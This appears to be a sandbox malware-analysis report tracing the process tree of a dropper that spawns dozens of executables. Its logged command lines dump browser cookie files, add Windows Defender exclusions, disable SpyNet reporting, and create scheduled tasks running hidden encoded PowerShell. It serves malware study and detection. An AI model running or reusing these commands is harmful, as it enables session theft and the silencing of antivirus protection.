Token: SeProfSingleProcessPrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeIncBasePriorityPrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeCreatePagefilePrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeCreatePermanentPrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeBackupPrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeRestorePrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeShutdownPrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe
Token: SeDebugPrivilege	856	vSN2ugPYT9UR4uUD5p7CwSVG.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0931826deaf2d247bbd4bf0f9db8b9ec4b1b1830f5763155487afc8dec645c5d.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exezaiqa_5.exezaiqa_4.exe

description	pid	process	target process
PID 2368 wrote to memory of 3444	2368	0931826deaf2d247bbd4bf0f9db8b9ec4b1b1830f5763155487afc8dec645c5d.exe	setup_installer.exe
PID 2368 wrote to memory of 3444	2368	0931826deaf2d247bbd4bf0f9db8b9ec4b1b1830f5763155487afc8dec645c5d.exe	setup_installer.exe
PID 2368 wrote to memory of 3444	2368	0931826deaf2d247bbd4bf0f9db8b9ec4b1b1830f5763155487afc8dec645c5d.exe	setup_installer.exe
PID 3444 wrote to memory of 3036	3444	setup_installer.exe	setup_install.exe
PID 3444 wrote to memory of 3036	3444	setup_installer.exe	setup_install.exe
PID 3444 wrote to memory of 3036	3444	setup_installer.exe	setup_install.exe
PID 3036 wrote to memory of 2088	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 2088	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 2088	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 4392	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 4392	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 4392	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 3956	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 3956	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 3956	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 4336	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 4336	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 4336	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 4292	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 4292	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 4292	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 4220	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 4220	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 4220	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 2944	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 2944	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 2944	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 4896	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 4896	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 4896	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 3588	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 3588	3036	setup_install.exe	cmd.exe
PID 3036 wrote to memory of 3588	3036	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 4780	2088	cmd.exe	zaiqa_1.exe
PID 2088 wrote to memory of 4780	2088	cmd.exe	zaiqa_1.exe
PID 2088 wrote to memory of 4780	2088	cmd.exe	zaiqa_1.exe
PID 4292 wrote to memory of 4876	4292	cmd.exe	zaiqa_5.exe
PID 4292 wrote to memory of 4876	4292	cmd.exe	zaiqa_5.exe
PID 4292 wrote to memory of 4876	4292	cmd.exe	zaiqa_5.exe
PID 3956 wrote to memory of 912	3956	cmd.exe	zaiqa_3.exe
PID 3956 wrote to memory of 912	3956	cmd.exe	zaiqa_3.exe
PID 3956 wrote to memory of 912	3956	cmd.exe	zaiqa_3.exe
PID 4220 wrote to memory of 1280	4220	cmd.exe	zaiqa_6.exe
PID 4220 wrote to memory of 1280	4220	cmd.exe	zaiqa_6.exe
PID 3588 wrote to memory of 2468	3588	cmd.exe	zaiqa_9.exe
PID 3588 wrote to memory of 2468	3588	cmd.exe	zaiqa_9.exe
PID 3588 wrote to memory of 2468	3588	cmd.exe	zaiqa_9.exe
PID 4336 wrote to memory of 1292	4336	cmd.exe	zaiqa_4.exe
PID 4336 wrote to memory of 1292	4336	cmd.exe	zaiqa_4.exe
PID 4336 wrote to memory of 1292	4336	cmd.exe	zaiqa_4.exe
PID 4392 wrote to memory of 1556	4392	cmd.exe	zaiqa_2.exe
PID 4392 wrote to memory of 1556	4392	cmd.exe	zaiqa_2.exe
PID 4392 wrote to memory of 1556	4392	cmd.exe	zaiqa_2.exe
PID 4896 wrote to memory of 3068	4896	cmd.exe	zaiqa_8.exe
PID 4896 wrote to memory of 3068	4896	cmd.exe	zaiqa_8.exe
PID 4896 wrote to memory of 3068	4896	cmd.exe	zaiqa_8.exe
PID 2944 wrote to memory of 1768	2944	cmd.exe	zaiqa_7.exe
PID 2944 wrote to memory of 1768	2944	cmd.exe	zaiqa_7.exe
PID 2944 wrote to memory of 1768	2944	cmd.exe	zaiqa_7.exe
PID 4876 wrote to memory of 2300	4876	zaiqa_5.exe	zaiqa_5.tmp
PID 4876 wrote to memory of 2300	4876	zaiqa_5.exe	zaiqa_5.tmp
PID 4876 wrote to memory of 2300	4876	zaiqa_5.exe	zaiqa_5.tmp
PID 1292 wrote to memory of 3712	1292	zaiqa_4.exe	zaiqa_4.exe
PID 1292 wrote to memory of 3712	1292	zaiqa_4.exe	zaiqa_4.exe

C:\Users\Admin\AppData\Local\Temp\0931826deaf2d247bbd4bf0f9db8b9ec4b1b1830f5763155487afc8dec645c5d.exe
"C:\Users\Admin\AppData\Local\Temp\0931826deaf2d247bbd4bf0f9db8b9ec4b1b1830f5763155487afc8dec645c5d.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2368

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3444

C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c zaiqa_9.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3588

C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\zaiqa_9.exe
zaiqa_9.exe
5⤵
- Executes dropped EXE
PID:2468

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
PID:3796

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"
6⤵
- Executes dropped EXE
PID:4384

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
PID:1840

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
6⤵
- Executes dropped EXE
PID:1920

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
PID:3964

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
6⤵
- Executes dropped EXE
PID:2640

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
PID:2012

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
6⤵
- Executes dropped EXE
PID:3332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c zaiqa_8.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4896

C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\zaiqa_8.exe
zaiqa_8.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3068

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:4924

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c zaiqa_7.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2944

C:\Users\Admin\AppData\Local\Temp\7zS47DEB40D\zaiqa_7.exe
zaiqa_7.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:1768

C:\Users\Admin\Documents\IoEo9tlbmwL9_uosKPhFtaEd.exe
"C:\Users\Admin\Documents\IoEo9tlbmwL9_uosKPhFtaEd.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2208

C:\Users\Admin\Documents\_fwutII_YYUyxpgW7o_1oTXj.exe
"C:\Users\Admin\Documents\_fwutII_YYUyxpgW7o_1oTXj.exe"
6⤵
- Executes dropped EXE
PID:2264

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:5732

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:5852

C:\Users\Admin\Documents\wllxekuSKBlOodGH1NbJ07uo.exe
"C:\Users\Admin\Documents\wllxekuSKBlOodGH1NbJ07uo.exe"
7⤵
PID:5724

C:\Users\Admin\Pictures\Adobe Films\w8cwmAu0KN71irBjJSq_8FLr.exe
"C:\Users\Admin\Pictures\Adobe Films\w8cwmAu0KN71irBjJSq_8FLr.exe"
8⤵
PID:3512

C:\Users\Admin\Pictures\Adobe Films\c5QNrV4VcM_iWw2hTIa6xd4l.exe
"C:\Users\Admin\Pictures\Adobe Films\c5QNrV4VcM_iWw2hTIa6xd4l.exe"
8⤵
PID:5940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 616
9⤵
- Program crash
PID:6004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 636
9⤵
- Program crash
PID:2344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 660
9⤵
- Program crash
PID:5944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 776
9⤵
- Program crash
PID:2420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 784
9⤵
- Program crash
PID:2852

C:\Users\Admin\Pictures\Adobe Films\FsvtY6k4LHcRh6n2IjNYm5fT.exe
"C:\Users\Admin\Pictures\Adobe Films\FsvtY6k4LHcRh6n2IjNYm5fT.exe"
8⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\is-PCTIE.tmp\FsvtY6k4LHcRh6n2IjNYm5fT.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PCTIE.tmp\FsvtY6k4LHcRh6n2IjNYm5fT.tmp" /SL5="$90116,140518,56832,C:\Users\Admin\Pictures\Adobe Films\FsvtY6k4LHcRh6n2IjNYm5fT.exe"
9⤵
PID:5476

C:\Users\Admin\AppData\Local\Temp\is-9KE6N.tmp\RYUT55.exe
"C:\Users\Admin\AppData\Local\Temp\is-9KE6N.tmp\RYUT55.exe" /S /UID=2709
10⤵
PID:5308

C:\Windows\system32\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
11⤵
PID:5520

C:\Users\Admin\Pictures\Adobe Films\2PezrUSjkK86zHpmhiNfb7X3.exe
"C:\Users\Admin\Pictures\Adobe Films\2PezrUSjkK86zHpmhiNfb7X3.exe"
8⤵
PID:1528

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:1560

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:2388

C:\Users\Admin\Pictures\Adobe Films\Oodn2bJJaEhGs_Keo38cWT2D.exe
"C:\Users\Admin\Pictures\Adobe Films\Oodn2bJJaEhGs_Keo38cWT2D.exe"
8⤵
PID:392

C:\Users\Admin\AppData\Local\Temp\7zS8FB5.tmp\Install.exe
.\Install.exe
9⤵
PID:1844

C:\Users\Admin\AppData\Local\Temp\7zS968B.tmp\Install.exe
.\Install.exe /S /site_id "525403"
10⤵
PID:5852

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
11⤵
- Executes dropped EXE
PID:4736

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
12⤵
PID:6132

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
13⤵
PID:376

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
13⤵
PID:5876

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
11⤵
PID:208

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
12⤵
PID:5364

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
13⤵
PID:4908

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
13⤵
PID:3704

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gIJRXSNdW" /SC once /ST 06:21:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
11⤵
- Creates scheduled task(s)
PID:4052

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gIJRXSNdW"
11⤵
PID:3704

C:\Users\Admin\Pictures\Adobe Films\Rx4hnfMeVTmwmduKlgZ5IojE.exe
"C:\Users\Admin\Pictures\Adobe Films\Rx4hnfMeVTmwmduKlgZ5IojE.exe"
8⤵
PID:5172

C:\Users\Admin\Pictures\Adobe Films\MK45EFA3AQTShYB245mYNJZ1.exe
"C:\Users\Admin\Pictures\Adobe Films\MK45EFA3AQTShYB245mYNJZ1.exe"
8⤵
PID:4904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4904 -s 952
9⤵
- Program crash
PID:3632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4904 -s 988
9⤵
- Program crash
PID:5360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4904 -s 996
9⤵
- Program crash
PID:2908

C:\Users\Admin\Pictures\Adobe Films\4aA97Vjm69rwEBOPLT0xsxgW.exe
"C:\Users\Admin\Pictures\Adobe Films\4aA97Vjm69rwEBOPLT0xsxgW.exe"
8⤵
PID:4876

C:\Users\Admin\AppData\Local\Temp\dengbing.exe
"C:\Users\Admin\AppData\Local\Temp\dengbing.exe"
9⤵
PID:3128

C:\Users\Admin\AppData\Local\Temp\SharkSoftSetup36667.exe
"C:\Users\Admin\AppData\Local\Temp\SharkSoftSetup36667.exe"
9⤵
PID:4084

C:\Users\Admin\AppData\Local\Temp\a79d8d9b-74db-45ca-8e9e-b178cabc59fd.exe
"C:\Users\Admin\AppData\Local\Temp\a79d8d9b-74db-45ca-8e9e-b178cabc59fd.exe"
10⤵
PID:3580

C:\Users\Admin\AppData\Local\Temp\lijh.exe
"C:\Users\Admin\AppData\Local\Temp\lijh.exe"
9⤵
PID:1888

C:\Users\Admin\AppData\Local\Temp\lijh.exe
"C:\Users\Admin\AppData\Local\Temp\lijh.exe" -h
10⤵
PID:5500

C:\Users\Admin\AppData\Local\Temp\inst100.exe
"C:\Users\Admin\AppData\Local\Temp\inst100.exe"
9⤵
PID:5368

C:\Users\Admin\AppData\Local\Temp\askinstall63.exe
"C:\Users\Admin\AppData\Local\Temp\askinstall63.exe"
9⤵
PID:452

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
10⤵
PID:4340

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
11⤵
- Kills process with taskkill
PID:6076

C:\Users\Admin\AppData\Local\Temp\md7_7dfj.exe
"C:\Users\Admin\AppData\Local\Temp\md7_7dfj.exe"
9⤵
PID:6140

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
9⤵
PID:2392

C:\Users\Admin\AppData\Local\Temp\is-BPDBP.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BPDBP.tmp\setup.tmp" /SL5="$3029E,2343741,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
10⤵
PID:4952

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
11⤵
PID:5356

C:\Users\Admin\AppData\Local\Temp\is-GRDND.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GRDND.tmp\setup.tmp" /SL5="$202BC,2343741,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
12⤵
PID:4764

C:\Users\Admin\AppData\Local\Temp\siww1049.exe
"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
9⤵
PID:3656

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:6056

C:\Users\Admin\AppData\Local\Temp\udontsay.exe
"C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
9⤵
PID:5752

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
9⤵
PID:1632

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"
9⤵
PID:5452

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\V~BVJJVx.KV
10⤵
PID:5040

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\V~BVJJVx.KV
11⤵
PID:3144

C:\Users\Admin\AppData\Local\Temp\accid.exe
"C:\Users\Admin\AppData\Local\Temp\accid.exe"
9⤵
PID:3672

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
10⤵
PID:3496

C:\Users\Admin\AppData\Local\Temp\ebook.exe
"C:\Users\Admin\AppData\Local\Temp\ebook.exe"
9⤵
PID:3444

C:\Users\Admin\AppData\Local\Temp\anytime1.exe
"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
9⤵
PID:4668

C:\Users\Admin\AppData\Local\Temp\anytime2.exe
"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
9⤵
PID:5840

C:\Users\Admin\AppData\Local\Temp\anytime3.exe
"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"
9⤵
PID:2624

C:\Users\Admin\AppData\Local\Temp\anytime4.exe
"C:\Users\Admin\AppData\Local\Temp\anytime4.exe"
9⤵
PID:5880

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
9⤵
PID:4424

C:\Users\Admin\Documents\hjKtg0zdS5PhRksOaEqR437o.exe
"C:\Users\Admin\Documents\hjKtg0zdS5PhRksOaEqR437o.exe"
6⤵
- Executes dropped EXE
PID:1440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 1532
7⤵
- Program crash
PID:3168

C:\Users\Admin\Documents\7sYUpdEKGUAsMvYnpTXFqI06.exe
"C:\Users\Admin\Documents\7sYUpdEKGUAsMvYnpTXFqI06.exe"
6⤵
- Executes dropped EXE
PID:1568

C:\Users\Admin\AppData\Local\Temp\927d806f-9229-42ac-91d4-9c1dfd4c8df6.exe
"C:\Users\Admin\AppData\Local\Temp\927d806f-9229-42ac-91d4-9c1dfd4c8df6.exe"
7⤵
PID:5496

C:\Users\Admin\Documents\LJu1gc3DcKXk0zKsOsFxl590.exe
"C:\Users\Admin\Documents\LJu1gc3DcKXk0zKsOsFxl590.exe"
6⤵
PID:4376

C:\Users\Admin\Documents\q9Z7_r4VGCHdXuLHDsjm3jy_.exe
"C:\Users\Admin\Documents\q9Z7_r4VGCHdXuLHDsjm3jy_.exe"
6⤵
- Executes dropped EXE
PID:3760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 472
7⤵
- Program crash
PID:5360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 464
7⤵
- Program crash
PID:5348

C:\Users\Admin\Documents\bwL6VKSUPxs79qzWTSHE00UC.exe
"C:\Users\Admin\Documents\bwL6VKSUPxs79qzWTSHE00UC.exe"
6⤵
- Executes dropped EXE
PID:3864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 472
7⤵
- Program crash
PID:5308

C:\Users\Admin\Documents\TjGft6wpxSRlstWc9hNXSyJl.exe
"C:\Users\Admin\Documents\TjGft6wpxSRlstWc9hNXSyJl.exe"
6⤵
- Executes dropped EXE
PID:1348

C:\Users\Admin\AppData\Local\Temp\is-D70HP.tmp\TjGft6wpxSRlstWc9hNXSyJl.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D70HP.tmp\TjGft6wpxSRlstWc9hNXSyJl.tmp" /SL5="$60198,140518,56832,C:\Users\Admin\Documents\TjGft6wpxSRlstWc9hNXSyJl.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3068

C:\Users\Admin\AppData\Local\Temp\is-1OA7F.tmp\RYUT55.exe
"C:\Users\Admin\AppData\Local\Temp\is-1OA7F.tmp\RYUT55.exe" /S /UID=2709
8⤵
PID:2032

C:\Windows\system32\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
9⤵
PID:1428

C:\Users\Admin\Documents\Tllsj2pLCMJh2BTg8xFub0k5.exe
"C:\Users\Admin\Documents\Tllsj2pLCMJh2BTg8xFub0k5.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2908

C:\Users\Admin\Documents\YLRDH7egV473HdojfQ2CVFjP.exe
"C:\Users\Admin\Documents\YLRDH7egV473HdojfQ2CVFjP.exe"
6⤵
- Executes dropped EXE
PID:3964

C:\Users\Admin\Documents\NMY9oES3WTvv7_effYSe5tbF.exe
"C:\Users\Admin\Documents\NMY9oES3WTvv7_effYSe5tbF.exe"
6⤵
- Executes dropped EXE
PID:1964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 504
7⤵
- Program crash
PID:5768

C:\Users\Admin\Documents\5n_S0ceKtKwCcfNjvftO8qxt.exe
"C:\Users\Admin\Documents\5n_S0ceKtKwCcfNjvftO8qxt.exe"
6⤵
- Executes dropped EXE
PID:4208

C:\Users\Admin\Documents\wGgG4BU2_Nenvn5tICBQ8slO.exe
"C:\Users\Admin\Documents\wGgG4BU2_Nenvn5tICBQ8slO.exe"
6⤵
- Executes dropped EXE
PID:2152

C:\Users\Admin\AppData\Local\Temp\7zS1797.tmp\Install.exe
.\Install.exe
7⤵
PID:1220

C:\Users\Admin\AppData\Local\Temp\7zS3050.tmp\Install.exe
.\Install.exe /S /site_id "525403"
8⤵
PID:5112

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
9⤵
PID:4820

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
10⤵
PID:332

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
11⤵
PID:5236

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
11⤵
PID:2460

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
9⤵
PID:5552

C:\Windows\SysWOW64\cmd.exe
